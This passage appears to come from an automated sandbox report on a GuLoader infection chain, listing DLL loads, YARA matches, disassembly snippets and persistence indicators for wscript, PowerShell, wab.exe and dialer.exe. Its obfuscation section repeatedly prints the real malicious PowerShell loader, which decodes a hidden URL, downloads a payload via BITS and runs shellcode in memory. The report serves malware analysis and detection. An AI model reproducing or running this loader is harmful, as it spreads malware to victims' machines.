                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: tapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\dialer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2544913073.0000000007047000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdb source: wab.exe, 00000007.00000003.2574386821.00000000255F0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2550855628.0000000007F27000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: wab.exe, 00000007.00000003.2572739867.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000007.00000003.2573715561.0000000025670000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2573394658.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: wab.exe, 00000007.00000003.2572739867.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2536849712.000000000081E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: wab.exe, 00000007.00000003.2573715561.0000000025670000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2573394658.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: wab.exe, 00000007.00000003.2574386821.00000000255F0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2536849712.000000000081E000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    VBScript performs obfuscated calls to suspicious functions
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){$bekraefte+=$Udr", "0")
                    Yara detected GuLoader
                    Source: Yara matchFile source: 00000005.00000002.2552866056.000000000A363000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2576092102.00000000055F3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2552391162.0000000008590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2541535117.0000000005841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Found suspicious powershell code related to unpacking or dynamic code loading
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Gazenpartn17)$global:bekraefte2 = [System.Text.Encoding]::ASCII.GetString($Opdatering)$global:bekraefte3=$bekraefte2.substring(272260,23729)<#Amfor Overa Antaean Inconsta rationalis
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Orihyper22301 $Chassazers $Knusen4), (Orihyper22300 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Orihyper22308 = ([AppDomain]::CurrentDomain.GetAssembli
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Anthotropi8)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Anthotropi9, $false).DefineType($Knusen0, $Kn
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Gazenpartn17)$global:bekraefte2 = [System.Text.Encoding]::ASCII.GetString($Opdatering)$global:bekraefte3=$bekraefte2.substring(272260,23729)<#Amfor Overa Antaean Inconsta rationalis
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BrJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BrJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF848E8D7B2 push edi; retf 1_2_00007FF848E8D7F6
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02DA0EF8 push eax; ret 5_2_02DA0F02
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02DA0EE8 push eax; ret 5_2_02DA0EF2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02DA0EA8 push eax; ret 5_2_02DA0EE2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02DA0F08 push eax; ret 5_2_02DA0F12
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02DA369C push ebx; iretd 5_2_02DA36DA
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_088D04B4 pushad ; iretd 7_2_088D04B5
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_3_032B4305 push F693B671h; retf 9_3_032B430A
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_3_032B3B74 pushad ; retf 9_3_032B3B83
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_3_032B21AF pushad ; ret 9_3_032B21B7
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_3_032B21EF push ecx; iretd 9_3_032B21FB
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_3_032B45FC push esi; ret 9_3_032B4600
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_3_032B4FC8 push es; ret 9_3_032B4FC9
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_3_032B0FCE push eax; retf 9_3_032B0FCF
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_3_032B3E4E push edi; iretd 9_3_032B3E55
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_3_032B5CD2 push dword ptr [edx+ebp+3Bh]; retf 9_3_032B5CDF
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_059698F0 push eax; ret 9_2_0596991E

                    Persistence and Installation Behavior

                    barindex
                    Powershell uses Background Intelligent Transfer Service (BITS)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls\BitsProxy.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
